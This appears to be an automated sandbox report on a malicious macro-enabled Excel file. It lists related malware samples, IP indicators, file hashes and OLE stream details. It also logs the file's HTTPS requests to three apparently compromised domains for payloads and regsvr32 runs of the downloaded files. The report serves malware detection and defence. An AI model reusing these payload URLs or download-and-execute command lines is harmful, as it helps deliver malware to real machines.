                  doc-379851424.xlsGet hashmaliciousBrowse
                  • 101.0.112.4
                  doc-220808714.xlsGet hashmaliciousBrowse
                  • 101.0.112.4
                  doc-220808714.xlsGet hashmaliciousBrowse
                  • 101.0.112.4
                  ITT - PPCL-2021-0515-PKG4 - pipping and drilling Services.docGet hashmaliciousBrowse
                  • 116.90.56.138
                  Inquiry-Doors.exeGet hashmaliciousBrowse
                  • 101.0.91.38
                  product specification.exeGet hashmaliciousBrowse
                  • 101.0.117.102
                  7PUgGUWM2lGet hashmaliciousBrowse
                  • 182.160.170.135
                  Attached Quotation.exeGet hashmaliciousBrowse
                  • 101.0.117.102
                  Cd9EA600XXdm0tl.exeGet hashmaliciousBrowse
                  • 101.0.117.102
                  E8ljMuBj9LGet hashmaliciousBrowse
                  • 111.67.13.18
                  QcXQmNSaSpGet hashmaliciousBrowse
                  • 49.156.27.62
                  arm7Get hashmaliciousBrowse
                  • 111.67.13.28
                  QYUNlRkkn1.exeGet hashmaliciousBrowse
                  • 203.16.60.34
                  6Y5P9BoimMLclbt.exeGet hashmaliciousBrowse
                  • 101.0.117.102
                  gunzipped.exeGet hashmaliciousBrowse
                  • 101.0.117.102
                  SecuriteInfo.com.Variant.Bulz.627351.21436.exeGet hashmaliciousBrowse
                  • 101.0.117.102
                  ENQUIRY.exeGet hashmaliciousBrowse
                  • 101.0.117.102
                  UNIFIEDLAYER-AS-1USJNuVQNwKoFGet hashmaliciousBrowse
                  • 98.131.204.220
                  2u2u8wnrrW.exeGet hashmaliciousBrowse
                  • 108.167.135.122
                  ClgNlmU3Is.exeGet hashmaliciousBrowse
                  • 74.220.199.6
                  divpCHa0h7.exeGet hashmaliciousBrowse
                  • 108.167.135.122
                  Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                  • 69.49.234.122
                  Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                  • 69.49.234.122
                  Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                  • 69.49.234.122
                  SecureMessage.docGet hashmaliciousBrowse
                  • 192.185.37.229
                  Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                  • 69.49.234.122
                  Farbestfoods.AP Summary.2752.htmlGet hashmaliciousBrowse
                  • 192.185.114.115
                  SURRENDED HBL CNSBIF0825FT.exeGet hashmaliciousBrowse
                  • 192.254.180.165
                  PO#13ORDER PDF.exeGet hashmaliciousBrowse
                  • 162.241.244.46
                  ORDER.vbsGet hashmaliciousBrowse
                  • 192.185.95.74
                  art-1881052385.xlsGet hashmaliciousBrowse
                  • 108.179.232.85
                  art-1881052385.xlsGet hashmaliciousBrowse
                  • 108.179.232.85
                  AWB 94000302-2391.exeGet hashmaliciousBrowse
                  • 192.185.84.191
                  Doc-CS3.exeGet hashmaliciousBrowse
                  • 192.185.105.182
                  SecuriteInfo.com.Artemis7FC3D3787CC9.2543.exeGet hashmaliciousBrowse
                  • 162.214.50.135
                  ORD2021100866752371AC.exeGet hashmaliciousBrowse
                  • 192.185.48.225
                  UaBxIF11A6Get hashmaliciousBrowse
                  • 173.254.28.91

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  7dcce5b76c8b17472d024758970a406bPayment_Receipt 7183.xlsGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  Sales_Receipt 6310.xlsGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  Purchase_Order 2586.xlsGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  Purchase_Order 1527.xlsGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  Import order764536.xlsxGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  art-1881052385.xlsGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  JrZcKXgWcl.vbsGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  doc-379851424.xlsGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  doc-220808714.xlsGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  INV.pptGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  Purchase Order .xlsxGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  MV JOLLY EXPRESS.docxGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  DHL_Delivery_Notification.docGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  FedEx AWB 884174658339.docGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  UPDATE INVOICE FM K & S INDUSTRY.docxGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  PO 347391.docxGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  swift.Telex.xlsGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  Invoice number 1257MAJAKFVII2021 incl. VAT.docGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  Consignment Notification.docGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35
                  RFQ87976VF.docGet hashmaliciousBrowse
                  • 101.0.119.207
                  • 194.233.72.245
                  • 216.172.187.35

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Oct 13 09:23:54 2021, Security: 0
                  Entropy (8bit):7.344863884969963
                  TrID:
                  • Microsoft Excel sheet (30009/1) 78.94%
                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                  File name:art-76929842.xls
                  File size:251904
                  MD5:33bcf716b28185aa2eda847e59ee2ae7
                  SHA1:bb2fa1728615f885c215c7e9accfdbcba123fd0d
                  SHA256:3dfc7abbc90d50209ca4584cbad952babf00bafc0e37dbbee31b1b184b74f718
                  SHA512:340a4c54fd90e31f357d0fdda44c05fc406499f9f6f76734618c8e3c68f910d059d210648a35869431b06eea6f563338b28291598431832bff1a2c306af2af9a
                  SSDEEP:6144:nKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgP9jWXcZZRBTq1BOzTwvOsPDslAvS32vI7M:y9jVzTmszTwvTDy33LvfP1OWG
                  File Content Preview:........................>......................................................................................................................................................................................................................................

                  File Icon

                  Icon Hash:e4eea286a4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "art-76929842.xls"

                  Indicators

                  Has Summary Info:True
                  Application Name:Microsoft Excel
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:True

                  Summary

                  Code Page:1251
                  Author:
                  Last Saved By:
                  Create Time:2015-06-05 18:19:34
                  Last Saved Time:2021-10-13 08:23:54
                  Creating Application:Microsoft Excel
                  Security:0

                  Document Summary

                  Document Code Page:1251
                  Thumbnail Scaling Desired:False
                  Company:
                  Contains Dirty Links:False
                  Shared Document:False
                  Changed Hyperlinks:False
                  Application Version:1048576

                  Streams

                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.43766981378
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . < . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S i m b b 1 . . . . . S i m b b 2 . . . . . S i m b b 3 . . . . . G G T . . . . . B r e r 1
                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 3c 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 f9 00 00 00
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5SummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.27571260507
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 240295
                  General
                  Stream Path:Workbook
                  File Type:Applesoft BASIC program data, first line number 16
                  Stream Size:240295
                  Entropy:7.52839130069
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . .
                  Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 14, 2021 09:51:28.013366938 CEST49165443192.168.2.22216.172.187.35
                  Oct 14, 2021 09:51:28.013417959 CEST44349165216.172.187.35192.168.2.22
                  Oct 14, 2021 09:51:28.013540030 CEST49165443192.168.2.22216.172.187.35
                  Oct 14, 2021 09:51:28.021220922 CEST49165443192.168.2.22216.172.187.35
                  Oct 14, 2021 09:51:28.021255016 CEST44349165216.172.187.35192.168.2.22
                  Oct 14, 2021 09:51:28.333925962 CEST44349165216.172.187.35192.168.2.22
                  Oct 14, 2021 09:51:28.334263086 CEST49165443192.168.2.22216.172.187.35
                  Oct 14, 2021 09:51:28.352838039 CEST49165443192.168.2.22216.172.187.35
                  Oct 14, 2021 09:51:28.352904081 CEST44349165216.172.187.35192.168.2.22
                  Oct 14, 2021 09:51:28.353319883 CEST44349165216.172.187.35192.168.2.22
                  Oct 14, 2021 09:51:28.353415012 CEST49165443192.168.2.22216.172.187.35
                  Oct 14, 2021 09:51:28.575752974 CEST49165443192.168.2.22216.172.187.35
                  Oct 14, 2021 09:51:28.619132042 CEST44349165216.172.187.35192.168.2.22
                  Oct 14, 2021 09:51:30.362735987 CEST44349165216.172.187.35192.168.2.22
                  Oct 14, 2021 09:51:30.362854004 CEST44349165216.172.187.35192.168.2.22
                  Oct 14, 2021 09:51:30.362960100 CEST49165443192.168.2.22216.172.187.35
                  Oct 14, 2021 09:51:30.363019943 CEST49165443192.168.2.22216.172.187.35
                  Oct 14, 2021 09:51:30.365247965 CEST49165443192.168.2.22216.172.187.35
                  Oct 14, 2021 09:51:30.365291119 CEST44349165216.172.187.35192.168.2.22
                  Oct 14, 2021 09:51:30.743822098 CEST49166443192.168.2.22101.0.119.207
                  Oct 14, 2021 09:51:30.743901968 CEST44349166101.0.119.207192.168.2.22
                  Oct 14, 2021 09:51:30.743972063 CEST49166443192.168.2.22101.0.119.207
                  Oct 14, 2021 09:51:30.745163918 CEST49166443192.168.2.22101.0.119.207
                  Oct 14, 2021 09:51:30.745186090 CEST44349166101.0.119.207192.168.2.22
                  Oct 14, 2021 09:51:31.425797939 CEST44349166101.0.119.207192.168.2.22
                  Oct 14, 2021 09:51:31.425915003 CEST49166443192.168.2.22101.0.119.207
                  Oct 14, 2021 09:51:31.438122034 CEST49166443192.168.2.22101.0.119.207
                  Oct 14, 2021 09:51:31.438138008 CEST44349166101.0.119.207192.168.2.22
                  Oct 14, 2021 09:51:31.438491106 CEST44349166101.0.119.207192.168.2.22
                  Oct 14, 2021 09:51:31.439146996 CEST49166443192.168.2.22101.0.119.207
                  Oct 14, 2021 09:51:31.457417965 CEST49166443192.168.2.22101.0.119.207
                  Oct 14, 2021 09:51:31.499138117 CEST44349166101.0.119.207192.168.2.22
                  Oct 14, 2021 09:51:34.089972973 CEST44349166101.0.119.207192.168.2.22
                  Oct 14, 2021 09:51:34.090055943 CEST44349166101.0.119.207192.168.2.22
                  Oct 14, 2021 09:51:34.090186119 CEST49166443192.168.2.22101.0.119.207
                  Oct 14, 2021 09:51:34.090334892 CEST49166443192.168.2.22101.0.119.207
                  Oct 14, 2021 09:51:34.090378046 CEST49166443192.168.2.22101.0.119.207
                  Oct 14, 2021 09:51:34.090399027 CEST44349166101.0.119.207192.168.2.22
                  Oct 14, 2021 09:51:34.090456009 CEST49166443192.168.2.22101.0.119.207
                  Oct 14, 2021 09:51:34.090471983 CEST49166443192.168.2.22101.0.119.207
                  Oct 14, 2021 09:51:34.452547073 CEST49167443192.168.2.22194.233.72.245
                  Oct 14, 2021 09:51:34.452578068 CEST44349167194.233.72.245192.168.2.22
                  Oct 14, 2021 09:51:34.452723980 CEST49167443192.168.2.22194.233.72.245
                  Oct 14, 2021 09:51:34.453340054 CEST49167443192.168.2.22194.233.72.245
                  Oct 14, 2021 09:51:34.453353882 CEST44349167194.233.72.245192.168.2.22
                  Oct 14, 2021 09:51:34.993633986 CEST44349167194.233.72.245192.168.2.22
                  Oct 14, 2021 09:51:34.993880987 CEST49167443192.168.2.22194.233.72.245
                  Oct 14, 2021 09:51:35.010462999 CEST49167443192.168.2.22194.233.72.245
                  Oct 14, 2021 09:51:35.010495901 CEST44349167194.233.72.245192.168.2.22
                  Oct 14, 2021 09:51:35.010850906 CEST44349167194.233.72.245192.168.2.22
                  Oct 14, 2021 09:51:35.010965109 CEST49167443192.168.2.22194.233.72.245
                  Oct 14, 2021 09:51:35.014977932 CEST49167443192.168.2.22194.233.72.245
                  Oct 14, 2021 09:51:35.059135914 CEST44349167194.233.72.245192.168.2.22
                  Oct 14, 2021 09:51:36.355149984 CEST44349167194.233.72.245192.168.2.22
                  Oct 14, 2021 09:51:36.355235100 CEST44349167194.233.72.245192.168.2.22
                  Oct 14, 2021 09:51:36.355443001 CEST49167443192.168.2.22194.233.72.245
                  Oct 14, 2021 09:51:36.355458021 CEST49167443192.168.2.22194.233.72.245
                  Oct 14, 2021 09:51:36.355662107 CEST49167443192.168.2.22194.233.72.245
                  Oct 14, 2021 09:51:36.355684042 CEST44349167194.233.72.245192.168.2.22
                  Oct 14, 2021 09:51:36.355694056 CEST49167443192.168.2.22194.233.72.245
                  Oct 14, 2021 09:51:36.355756044 CEST49167443192.168.2.22194.233.72.245

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 14, 2021 09:51:27.975033998 CEST5216753192.168.2.228.8.8.8
                  Oct 14, 2021 09:51:27.993766069 CEST53521678.8.8.8192.168.2.22
                  Oct 14, 2021 09:51:30.396545887 CEST5059153192.168.2.228.8.8.8
                  Oct 14, 2021 09:51:30.740104914 CEST53505918.8.8.8192.168.2.22
                  Oct 14, 2021 09:51:34.111712933 CEST5780553192.168.2.228.8.8.8
                  Oct 14, 2021 09:51:34.450437069 CEST53578058.8.8.8192.168.2.22

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Oct 14, 2021 09:51:27.975033998 CEST192.168.2.228.8.8.80x98b3Standard query (0)bostonavenue.orgA (IP address)IN (0x0001)
                  Oct 14, 2021 09:51:30.396545887 CEST192.168.2.228.8.8.80x2410Standard query (0)pmqdermatology.com.auA (IP address)IN (0x0001)
                  Oct 14, 2021 09:51:34.111712933 CEST192.168.2.228.8.8.80xda70Standard query (0)funzy.idA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Oct 14, 2021 09:51:27.993766069 CEST8.8.8.8192.168.2.220x98b3No error (0)bostonavenue.org216.172.187.35A (IP address)IN (0x0001)
                  Oct 14, 2021 09:51:30.740104914 CEST8.8.8.8192.168.2.220x2410No error (0)pmqdermatology.com.au101.0.119.207A (IP address)IN (0x0001)
                  Oct 14, 2021 09:51:34.450437069 CEST8.8.8.8192.168.2.220xda70No error (0)funzy.id194.233.72.245A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • bostonavenue.org
                  • pmqdermatology.com.au
                  • funzy.id

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.2249165216.172.187.35443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  TimestampkBytes transferredDirectionData
                  2021-10-14 07:51:28 UTC0OUTGET /zunSJE0UYwbJ/sunise.html HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: bostonavenue.org
                  Connection: Keep-Alive
                  2021-10-14 07:51:30 UTC0INHTTP/1.1 200 OK
                  Date: Thu, 14 Oct 2021 07:51:28 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.2249166101.0.119.207443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  TimestampkBytes transferredDirectionData
                  2021-10-14 07:51:31 UTC0OUTGET /0aafNmAW9/suraise.html HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: pmqdermatology.com.au
                  Connection: Keep-Alive
                  2021-10-14 07:51:34 UTC0INHTTP/1.1 200 OK
                  Connection: close
                  x-powered-by: PHP/7.2.34
                  content-type: text/html; charset=UTF-8
                  content-length: 0
                  date: Thu, 14 Oct 2021 07:51:33 GMT
                  server: LiteSpeed
                  vary: User-Agent
                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.2249167194.233.72.245443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  TimestampkBytes transferredDirectionData
                  2021-10-14 07:51:35 UTC1OUTGET /0KICC3zxK2nT/sunraie.html HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: funzy.id
                  Connection: Keep-Alive
                  2021-10-14 07:51:36 UTC1INHTTP/1.1 200 OK
                  Connection: close
                  X-Powered-By: PHP/7.3.28
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 0
                  Date: Thu, 14 Oct 2021 07:51:36 GMT
                  Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000


                  Code Manipulations

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:09:51:14
                  Start date:14/10/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13f310000
                  File size:28253536 bytes
                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:09:51:24
                  Start date:14/10/2021
                  Path:C:\Windows\System32\regsvr32.exe
                  Wow64 process (32bit):false
                  Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
                  Imagebase:0xff880000
                  File size:19456 bytes
                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:51:25
                  Start date:14/10/2021
                  Path:C:\Windows\System32\regsvr32.exe
                  Wow64 process (32bit):false
                  Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
                  Imagebase:0xff880000
                  File size:19456 bytes
                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:51:25
                  Start date:14/10/2021
                  Path:C:\Windows\System32\regsvr32.exe
                  Wow64 process (32bit):false
                  Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
                  Imagebase:0xff880000
                  File size:19456 bytes
                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Code Analysis

                  Reset < >